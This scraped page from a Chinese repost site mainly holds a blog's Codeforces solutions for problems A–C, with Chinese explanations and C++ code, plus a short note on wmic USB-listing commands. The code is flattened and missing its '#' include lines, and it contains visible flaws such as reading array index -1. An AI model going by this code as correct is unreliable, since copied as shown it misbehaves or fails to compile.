Gin与实时处理的无限可能 Gin的强大之处不仅仅在于它的易用性和灵活性,更在于它为开发者提供了广阔的想象空间。无论是构建大型分布式系统,还是打造小型实验项目,Gin都能胜任。 如果你也想尝试用Gin构建实时处理系统,不妨从一个小目标开始——比如做一个简单的在线聊天室。相信我,当你第一次看到用户实时交流的画面时,那种成就感绝对会让你欲罢不能! 最后的话 写这篇文章的过程,其实也是我自己重新审视Gin的过程。其实这个东西吧,说白了挺简单的,但让我学到了一个本事——用最利索的办法搞定事情。希望这篇文章也能点醒你,让你在今后的开发路上,慢慢琢磨出属于自己的那套玩法!加油吧,程序员们!
2025-04-07 16:03:11
65
时光倒流
转载文章
...ring that reads the same backward as forward. For example, the strings “z”, “aaa”, “aba”, and “abccba” are palindromes, but “codeforces” and “ab” are not. You hate palindromes because they give you déjà vu. There is a string s . You must insert exactly one character ‘a’ somewhere in s . If it is possible to create a string that is not a palindrome, you should find one example. Otherwise, you should report that it is impossible. For example, suppose s= “cbabc”. By inserting an ‘a’, you can create “acbabc”, “cababc”, “cbaabc”, “cbabac”, or “cbabca”. However “cbaabc” is a palindrome, so you must output one of the other options. Input The first line contains a single integer t (1≤t≤104 ) — the number of test cases. The only line of each test case contains a string s consisting of lowercase English letters. The total length of all strings does not exceed 3⋅105 . Output For each test case, if there is no solution, output “NO”. Otherwise, output “YES” followed by your constructed string of length |s|+1 on the next line. If there are multiple solutions, you may print any. You can print each letter of “YES” and “NO” in any case (upper or lower). Example Input Copy 6 cbabc ab zza ba a nutforajaroftuna Output Copy YES cbabac YES aab YES zaza YES baa NO YES nutforajarofatuna Note The first test case is described in the statement. In the second test case, we can make either “aab” or “aba”. But “aba” is a palindrome, so “aab” is the only correct answer. In the third test case, “zaza” and “zzaa” are correct answers, but not “azza”. In the fourth test case, “baa” is the only correct answer. In the fifth test case, we can only make “aa”, which is a palindrome. So the answer is “NO”. In the sixth test case, “anutforajaroftuna” is a palindrome, but inserting ‘a’ elsewhere is valid. 题意: 给你一个字符串,然后你可以通过在任意位置上+‘a’,然后让这个字符串不是回文字符串,如果实在无法让字符串变成非回文,则输出NO。 思路: 我们可以判断出只有全为a的回文字符串才会+‘a’后无法变成非回文串,其他的都可以在任意位置上“a”,使字符串变成非回文串,那我们可以直接在首或者尾“a”,然后循环判断是否为回文,输出非回文的那一种就可以了。 代码: include<bits/stdc++.h>using namespace std;bool judge(string p){for(int i=0,j=p.size()-1;i<j;i++,j--){if(p[i]!=p[j])return true;}return false;}int main (){int t;cin>>t;while(t--){string ch;cin>>ch;int f=0;for(int i=0;i<ch.size();i++){if(ch[i]!='a'){f=1;break;} }if(f==0){cout<<"NO"<<endl;}else{string ch1,ch2;ch1="a"+ch;ch2=ch+"a";if(judge(ch1)){cout<<"YES"<<endl;cout<<'a';for(int i=0;i<ch.size();i++) cout<<ch[i];cout<<endl;}else{if(judge(ch2)) {cout<<"YES"<<endl;for(int i=0;i<ch.size();i++) cout<<ch[i];cout<<'a';cout<<endl;}elsecout<<"NO"<<endl;} }}return 0;} B. Flip the Bits time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output There is a binary string a of length n. In one operation, you can select any prefix of a with an equal number of 0 and 1 symbols. Then all symbols in the prefix are inverted: each 0 becomes 1 and each 1 becomes 0 For example, suppose a=0111010000 since it has four 0’s and four 1’s: [01110100]00→[10001011]00 In the second operation, we can select the prefix of length 2 since it has one 0 and one 1: [10]00101100→[01]00101100 It is illegal to select the prefix of length 4 for the third operation, because it has three 0’s and one Can you transform the string a into the string b using some finite number of operations (possibly, none)? Input The first line contains a single integer t (1≤t≤104) — the number of test cases. 
The first line of each test case contains a single integer n (1≤n≤3⋅105) — the length of the strings a and b The following two lines contain strings a and b of length n, consisting of symbols 0 and 1 The sum of n across all test cases does not exceed 3⋅105 Output For each test case, output “YES” if it is possible to transform ainto b, or “NO” if it is impossible. You can print each letter in any case (upper or lower). Example Input Copy 5 10 0111010000 0100101100 4 0000 0000 3 001 000 12 010101010101 100110011010 6 000111 110100 Output Copy YES YES NO YES NO Note The first test case is shown in the statement. In the second test case, we transform a into b by using zero operations. In the third test case, there is no legal operation, so it is impossible to transform a into b . In the fourth test case, here is one such transformation: Select the length 2 prefix to get 100101010101 . Select the length 12 prefix to get 011010101010 . Select the length 8 prefix to get 100101011010 . Select the length 4 prefix to get 011001011010 . Select the length 6 prefix to get 100110011010 In the fifth test case, the only legal operation is to transform a into 111000. From there, the only legal operation is to return to the string we started with, so we cannot transform a into b 题意: 给你一个字符串a,b,由0,1组成,然后只有在字符串下标i前面的0,1个数相同时,你可以进行把0->1,1->0,然后看是否能进行一些操作把字符串a变成b。 思路: 这题思路有点难想,你看,它每次个数相同时,都可以进行操作,所以我们从后往前进行操作,因为如果从前往后,小区间会影响大区间的,所以从大区间向小区间进行,然后遍历字符串,将每一位的0,1的个数进行计算,然后将a,b不相同的下标进行标记为1,代表需要改变。 从后遍历,cnt进行次数,因为如果是奇数的话,才会变成不一样的数字,偶数的话,区间变化会使它变回去了,在判断当前位之前,我们先看之前的大区间的变化将当前第i位变成了什么,因为只有0,1,跟标记的0,1是代表他是否需要变化,假如说:原先为0,他后面的区间将它变化了奇数次,那么它就现在是需要变化的才能变成吧b。原先为1,它后面的区间将它变化了偶数次,就还是1。如果这个下标的标记为1,代表需要被变化,我们就判断当前位的0,1个数是否相同,相同的话就代表了一次变化cnt++,否则就退出无法变成b了,因为之后没有区间将它再次变化了。然后我们就可以判断了 代码: include<bits/stdc++.h>using namespace std;const int N=3e5+7;int s0[N],s1[N];int a[N],b[N],p[N];int main (){int t;cin>>t;while(t--){int n;cin>>n;string a,b;cin>>a>>b;memset(p,0,sizeof p);for(int i=0;i<n;i++){if(a[i]=='0'){s0[i]=s0[i-1]+1;s1[i]=s1[i-1];}else{s1[i]=s1[i-1]+1;s0[i]=s0[i-1];}if(a[i]!=b[i]){p[i]=1;//是否相同的标记} }int cnt=0;int f=0;for(int i=n-1;i>=0;i--){if(cnt%2==1){//奇数次才会被变化p[i]=1-p[i];}//而且必须在前面判这一步,因为你得先看后面的区间将这一位变成了什么if(p[i]){if(s0[i]==s1[i]) cnt++;//0,1相同时才可以进行一次变化else {f=1;break;} }}if(f==1){cout<<"NO"<<endl;}else{cout<<"YES"<<endl;} }return 0;}//这个就利用了一个标记来判断当前为被影响成了什么/01 01 01 01 01 0110 01 10 01 10 10100101010101011010101010100101011010011001011010100110011010Select the length 12prefix to get.Select the length 8prefix to get.Select the length 4prefix to get.Select the length 6prefix to get01 110100 0001 001011 00/ C. Balance the Bits time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output A sequence of brackets is called balanced if one can turn it into a valid math expression by adding characters ‘+’ and ‘1’. For example, sequences ‘(())()’, ‘()’, and ‘(()(()))’ are balanced, while ‘)(’, ‘(()’, and ‘(()))(’ are not. You are given a binary string s of length n. Construct two balanced bracket sequences a and b of length n such that for all 1≤i≤n if si=1, then ai=bi if si=0, then ai≠bi If it is impossible, you should report about it. Input The first line contains a single integer t (1≤t≤104) — the number of test cases. The first line of each test case contains a single integer n (2≤n≤2⋅105, nis even). The next line contains a string sof length n, consisting of characters 0 and 1.The sum of nacross all test cases does not exceed 2⋅105. 
Output If such two balanced bracked sequences exist, output “YES” on the first line, otherwise output “NO”. You can print each letter in any case (upper or lower). If the answer is “YES”, output the balanced bracket sequences a and b satisfying the conditions on the next two lines.If there are multiple solutions, you may print any. Example Input Copy 3 6 101101 10 1001101101 4 1100 Output Copy YES ()()() ((())) YES ()()((())) (())()()() NO Note In the first test case, a= “()()()” and b="((()))". The characters are equal in positions 1, 3, 4, and 6, which are the exact same positions where si=1 .In the second test case, a= “()()((()))” and b="(())()()()". The characters are equal in positions 1, 4, 5, 7, 8, 10, which are the exact same positions where si=1 In the third test case, there is no solution. 题意: 一个n代表01串的长度,构造两个长度为n的括号序列,给你一个01串,代表着a,b两个序列串字符不相同。然后你来判断是否有合理的a,b串。有的话输出。 思路: 这题想了很久想不明白,看了大佬的题解,迷迷糊糊差不多理解吧。这题是这样的,就是: (1)第一步得合法的字符串,所以首尾得是相同的且都为1 (2)第二步,因为01串长度为偶数,所以如果合法的话,得( 的个数= ) 的个数,然后你想呀,假如为 ()()()()吧,然后你有一个0破坏了一个括号,但如果合法的话,是不是得还有一个0再破坏一个括号,然后被破坏的这俩个进行分配才能合理,所以如果合法的话,01串得0的个数为偶数,1的个数自然而然为偶数吧。 (3)最后一步构造,既然1的个数为偶数,首尾又都为1,所以1的个数前sum1/2个1构造为‘( ’,后sum1/2个构造为‘)’,然后我们1的所有的目前是合法的,然后剩下的0也是偶数的,然后如果让他们合法进行分配就( )间接进行就可以了,然后我们根据01串将b构造出来。合法的核心就是当前位的(个数大于等于),所以我们在循环进行判断一下a,b串是否都满足,(其实我觉得这么构造出来,a必然合理呀,其实就判b就行了,我保险起见都判了)。 代码: include<bits/stdc++.h>using namespace std;const int N=3e5+7;char a[N],b[N];int main (){int t;cin>>t;while(t--){int n;cin>>n;string s;cin>>s;if(s[0]!=s[n-1]&&s[0]!='1'){cout<<"NO"<<endl;}else{int sum1=0,sum0=0;for(int i=0;i<s.size();i++){if(s[i]=='1') sum1++;else sum0++;}if(sum1%2!=0||sum0%2!=0){cout<<"NO"<<endl;}else{int cnt1=0,cnt0=1;for(int i=0;i<n;i++){if(s[i]=='1'&&cnt1<sum1/2){a[i]='(';cnt1++;}else if(s[i]=='1'&&cnt1>=sum1/2){a[i]=')';cnt1++;}else if(s[i]=='0'&&cnt0%2==1){a[i]='(';cnt0++;}else if(s[i]=='0'&&cnt0%2==0){a[i]=')';cnt0++;}//cout<<a[i]<<endl;}for(int i=0;i<n;i++){if(s[i]=='0'){if(a[i]=='(') b[i]=')';else b[i]='(';}else{b[i]=a[i];}//cout<<b[i]<<endl;}// cout<<"YES"<<endl;int f=0;int s0=0,s1=0;for(int i=0;i<n;i++){if(a[i]=='(') s0++;else if(a[i]==')') s1++;if(s0<s1) {f=1;break;} }s0=0,s1=0;for(int i=0;i<n;i++){if(b[i]=='(') s0++;else if(b[i]==')') s1++;if(s0<s1) {f=1;break;} }if(f==0){cout<<"YES"<<endl;for(int i=0;i<n;i++) cout<<a[i];cout<<endl;for(int i=0;i<n;i++) cout<<b[i];cout<<endl;}else{cout<<"NO"<<endl;} }} }return 0;}/01 01 01 01 01 0110 01 10 01 10 10100101010101011010101010100101011010011001011010100110011010Select the length 12prefix to get.Select the length 8prefix to get.Select the length 4prefix to get.Select the length 6prefix to get01 110100 0001 001011 00/ 本篇文章为转载内容。原文链接:https://blog.csdn.net/lvy_yu_ET/article/details/115575091。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-10-05 13:54:12
228
转载
转载文章
...ferences][Update Table] 5 Sparx EA 5.1 Basic Design - Toolbox Message/Argument/Return Value Publish - Save - Save to Clipboard 5.2 Advanced Copy/Paste - Copy to Clipboard - Full Structure for Duplication Copy/Paste - Paste Package from Clipboard 6 USB Win7 CMD: wmic path Win32_PnPSignedDriver | find "Android" wmic path Win32_PnPSignedDriver | find "USB" :: similar to Linux lsusb wmic path Win32_USBControllerDevice get Dependent 7 Abbreviations CAB: Capacity Approval Board Npcap: Nmap Packet Capture wmic: Windows Management Instrumentation Command-line 本篇文章为转载内容。原文链接:https://blog.csdn.net/zoosenpin/article/details/118596813。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-09-10 16:27:10
270
转载
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
nohup command &
- 在后台运行命令且在退出终端后仍继续运行。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"